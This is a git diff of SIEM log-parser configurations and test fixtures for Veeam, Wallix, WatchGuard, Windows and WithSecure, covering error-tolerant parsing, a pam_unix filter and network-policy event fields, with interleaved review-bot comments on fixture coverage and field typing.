diff --git a/Veeam/veeam_backup/ingest/parser.yml b/Veeam/veeam_backup/ingest/parser.yml
index 5470c716c..7054d0a51 100644
--- a/Veeam/veeam_backup/ingest/parser.yml
+++ b/Veeam/veeam_backup/ingest/parser.yml
@@ -17,6 +17,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: "{{parsed_event.message.UserName}}"
 output_field: user
 pattern: '%{GREEDYDATA:domain}\\%{GREEDYDATA:name}'
diff --git a/Wallix/wallix-bastion/ingest/parser.yml b/Wallix/wallix-bastion/ingest/parser.yml
index ed76d3f43..d9f1be434 100644
--- a/Wallix/wallix-bastion/ingest/parser.yml
+++ b/Wallix/wallix-bastion/ingest/parser.yml
@@ -2,6 +2,7 @@ name: wallix-bastion
 ignored_values: ["-"]
 pipeline:
 - name: parsed_event
+ filter: '{{not original.message.startswith("pam_unix(")}}'
 external:
 name: kv.parse-kv
 properties:
diff --git a/Wallix/wallix-bastion/tests/cron.json b/Wallix/wallix-bastion/tests/cron.json
index da4487e2e..fdb9da3bc 100644
--- a/Wallix/wallix-bastion/tests/cron.json
+++ b/Wallix/wallix-bastion/tests/cron.json
@@ -15,7 +15,6 @@
 },
 "user": {
 "name": "root"
- },
- "wallix": {}
+ }
 }
 }
\ No newline at end of file
diff --git a/Wallix/wallix-bastion/tests/pam_unix.json b/Wallix/wallix-bastion/tests/pam_unix.json
index 5dd28b147..d7ce961b4 100644
--- a/Wallix/wallix-bastion/tests/pam_unix.json
+++ b/Wallix/wallix-bastion/tests/pam_unix.json
@@ -15,7 +15,6 @@
 },
 "user": {
 "name": "wabuser"
- },
- "wallix": {}
+ }
 }
 }
\ No newline at end of file
diff --git a/Wallix/wallix-bastion/tests/rexec.json b/Wallix/wallix-bastion/tests/rexec.json
deleted file mode 100644
index 14e87bd1a..000000000
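Review bot: The new `filter` on the `parsed_event` stage skips key-value parsing for messages that start with `pam_unix(`, which is consistent with the `"wallix": {}` removal in the cron.json and pam_unix.json fixtures, but the only other free-text sshd fixture, tests/rexec.json, is deleted in the same commit rather than updated; if that line now fails or yields nothing in the kv stage, keeping the fixture with an adjusted expectation (or adding a second prefix to the filter) would preserve coverage for it. A short comment above the filter, `# pam_unix lines are free text, not key=value; skip the kv stage for them`, would document why this prefix is special-cased. The stage's `external:` block continues outside the hunk.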
--- a/Wallix/wallix-bastion/tests/rexec.json
+++ /dev/null
@@ -1,12 +0,0 @@
-{
- "input": {
- "message": "rexec line 15: Deprecated option UsePrivilegeSeparation"
- },
- "expected": {
- "message": "rexec line 15: Deprecated option UsePrivilegeSeparation",
- "event": {
- "provider": "sshd"
- },
- "wallix": {}
- }
-}
\ No newline at end of file
diff --git a/WatchGuard/watchguard-firebox/ingest/parser.yml b/WatchGuard/watchguard-firebox/ingest/parser.yml
index 23bdfd0d6..36e32c512 100644
--- a/WatchGuard/watchguard-firebox/ingest/parser.yml
+++ b/WatchGuard/watchguard-firebox/ingest/parser.yml
@@ -14,6 +14,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: "{{parsed_event.message.msg}}"
 output_field: message
 pattern: "%{DHCP}|%{USER_LOG}"
diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml
index 988ae3dbc..80474d3ce 100644
--- a/Windows/windows/ingest/parser.yml
+++ b/Windows/windows/ingest/parser.yml
@@ -24,6 +24,7 @@ pipeline:
 external:
 name: kv.parse-kv
 properties:
+ raise_errors: false
 input_field: "{{json.event.Message}}"
 output_field: result
 value_sep: ":"
@@ -35,6 +36,7 @@ pipeline:
 external:
 name: kv.parse-kv
 properties:
+ raise_errors: false
 input_field: "{{json.event.Hashes or json.event.Hash}}"
 output_field: result
 value_sep: "="
@@ -46,6 +48,7 @@ pipeline:
 external:
 name: kv.parse-kv
 properties:
+ raise_errors: false
 input_field: "{{json.event.Hashes or json.event.Hash}}"
 output_field: result
 value_sep: ":"
@@ -84,6 +87,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: "{{json.event.IpAddress}}"
 output_field: event
 pattern: "%{GREEDYDATA}%{IPV4:ip}%{GREEDYDATA}"
@@ -94,6 +98,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: "{{parsed_message_kv.result.Contents}}"
 output_field: event
 pattern: >-
@@ -105,6 +110,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: "{{json.event.url or json.event.RemoteName}}"
 output_field: event
 pattern: >-
@@ -116,6 +122,7 @@ pipeline:
 name: grok.match
 description: #NEWLINE# is used because grok does not match multi-line fields and the KV stage does not support this field format.
 properties:
+ raise_errors: false
 input_field: '{{json.event.ContextInfo.replace(" "," ").replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}'
 output_field: event
 pattern: "%{CONTEXTINFO_FR}|%{CONTEXTINFO_EN}"
@@ -128,6 +135,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}'
 output_field: result
 pattern: >-
@@ -139,6 +147,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: '{{json.event.Message.replace("\r\n", "#NEWLINE#").replace("\n", "#NEWLINE2#")}}'
 output_field: event
 pattern: >-
@@ -153,8 +162,7 @@ pipeline:
 - name: set_file
 - name: set_user
 - name: process_ids
- - name: source_ip
- - name: source_address
+ - name: set_source_fields
 - name: action_outcome
 - name: set_dll
 filter: "{{ json.event.SourceName == 'Microsoft-Windows-Sysmon' and json.event.EventID == 7}}"
@@ -165,6 +173,8 @@ pipeline:
 - name: dns_fields
 - name: action_target
 - name: destination
+ - name: set_network_policy_fields
+ filter: "{{ json.event.SourceName == 'Microsoft-Windows-Security-Auditing' and json.event.EventID in [6272, 6273, 6274, 6275, 6276, 6277, 6278, 6279, 6280]}}"
 - name: rule
 - name: finalize
@@ -1106,7 +1116,7 @@ stages:
 action.outcome: "failure"
 filter: "{{json.event.EventType == 'AUDIT_FAILURE' }}"

- source_ip:
+ set_source_fields:
 actions:
 - set:
 source.ip: "{{json.event.SourceIp or json.event.SourceAddress}}"
@@ -1131,8 +1141,6 @@ stages:
 - set:
 source.ip: "{{source_ip_ip_address.event.ip}}"

- source_address:
- actions:
 - set:
 source.address: "{{json.event.SourceIp}}"
 filter: "{{json.event.SourceIp | is_ipaddress}}"
@@ -1153,6 +1161,17 @@ stages:
 source.address: "{{json_event.message.SourceAddr}}"
 filter: "{{json.event.SourceAddr | is_ipaddress}}"

+ set_network_policy_fields:
+ actions:
+ - set:
+ source.ip: "{{ json.event.CallingStationID }}"
+ filter: "{{json.event.CallingStationID | is_ipaddress}}"
+ - set:
+ source.mac: "{{ json.event.CallingStationID }}"
+ filter: "{{ final.source.ip == null }}"
+ - set:
+ destination.domain: "{{ json.event.AuthenticationServer }}"
+
 rule:
 actions:
 - set:
diff --git a/Windows/windows/tests/Event_6272.json b/Windows/windows/tests/Event_6272.json
index 4a3212af2..20213504d 100644
--- a/Windows/windows/tests/Event_6272.json
+++ b/Windows/windows/tests/Event_6272.json
@@ -42,6 +42,14 @@
 "record_id": 1674356873,
 "type": "Security"
 },
+ "destination": {
+ "address": "auth.example.org",
+ "domain": "auth.example.org",
+ "registered_domain": "example.org",
+ "size_in_char": 16,
+ "subdomain": "auth",
+ "top_level_domain": "org"
+ },
 "host": {
 "hostname": "hostname.example.org",
 "name": "hostname.example.org"
@@ -63,6 +71,7 @@
 },
 "related": {
 "hosts": [
+ "auth.example.org",
 "hostname.example.org"
 ],
 "user": [
diff --git a/Windows/windows/tests/Event_6273.json b/Windows/windows/tests/Event_6273.json
index 8ad5a2226..118cf2445 100644
--- a/Windows/windows/tests/Event_6273.json
+++ b/Windows/windows/tests/Event_6273.json
@@ -42,6 +42,14 @@
 "record_id": 783949626,
 "type": "Security"
 },
+ "destination": {
+ "address": "auth.example.org",
+ "domain": "auth.example.org",
+ "registered_domain": "example.org",
+ "size_in_char": 16,
+ "subdomain": "auth",
+ "top_level_domain": "org"
+ },
 "host": {
 "hostname": "hostname.example.org",
 "name": "hostname.example.org"
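Review bot: In the new `set_network_policy_fields` stage, `destination.domain` is set from `AuthenticationServer` unconditionally, so an IP-valued server lands in a domain field; the process_6272.json fixture in this commit expects exactly that (`"destination": {"address": "1.2.3.4", "domain": "1.2.3.4"}` with no `destination.ip`). Mirroring the `is_ipaddress` check the stage already applies to `CallingStationID` keeps the ECS types consistent, and that fixture's expectation would then move to `destination.ip`. The `source.mac` set also accepts any non-IP `CallingStationID`; I cannot confirm that attribute's value space from the hunk, but if it can carry anything other than an IP or a MAC, a format guard on that filter would keep `source.mac` clean. The stage sits in the `stages:` mapping whose start is outside the hunk.
```yaml
 set_network_policy_fields:
   actions:
     # … unchanged: source.ip / source.mac from CallingStationID …
     - set:
         destination.ip: "{{ json.event.AuthenticationServer }}"
       filter: "{{ json.event.AuthenticationServer | is_ipaddress }}"
     - set:
         destination.domain: "{{ json.event.AuthenticationServer }}"
       filter: "{{ final.destination.ip == null }}"
```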
@@ -63,6 +71,7 @@
 },
 "related": {
 "hosts": [
+ "auth.example.org",
 "hostname.example.org"
 ],
 "user": [
diff --git a/Windows/windows/tests/process_6272.json b/Windows/windows/tests/process_6272.json
index af1d9fe1d..3135f15c9 100644
--- a/Windows/windows/tests/process_6272.json
+++ b/Windows/windows/tests/process_6272.json
@@ -42,6 +42,11 @@
 "record_id": 2324634,
 "type": "Security"
 },
+ "destination": {
+ "address": "1.2.3.4",
+ "domain": "1.2.3.4",
+ "size_in_char": 7
+ },
 "host": {
 "hostname": "test",
 "name": "test"
@@ -63,12 +68,20 @@
 },
 "related": {
 "hosts": [
+ "1.2.3.4",
 "test"
 ],
+ "ip": [
+ "10.24.25.25"
+ ],
 "user": [
 "testUser"
 ]
 },
+ "source": {
+ "address": "10.24.25.25",
+ "ip": "10.24.25.25"
+ },
 "user": {
 "domain": "NT01",
 "id": "S-1-5-21-1111111111-111111111-1111111111-1111",
diff --git a/WithSecure/withsecure-elements/ingest/parser.yml b/WithSecure/withsecure-elements/ingest/parser.yml
index 83bd21cff..3f8525c4d 100644
--- a/WithSecure/withsecure-elements/ingest/parser.yml
+++ b/WithSecure/withsecure-elements/ingest/parser.yml
@@ -17,6 +17,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: "{{json_event.message.details.userName}}"
 output_field: user
 pattern: "(%{DATA:domain}[/\\\\]+)?(%{USERNAME:name})"
@@ -25,6 +26,7 @@ pipeline:
 external:
 name: grok.match
 properties:
+ raise_errors: false
 input_field: "{{json_event.message.userName}}"
 output_field: user
 pattern: "(%{DATA:domain}[/\\\\]+)?(%{USERNAME:name})"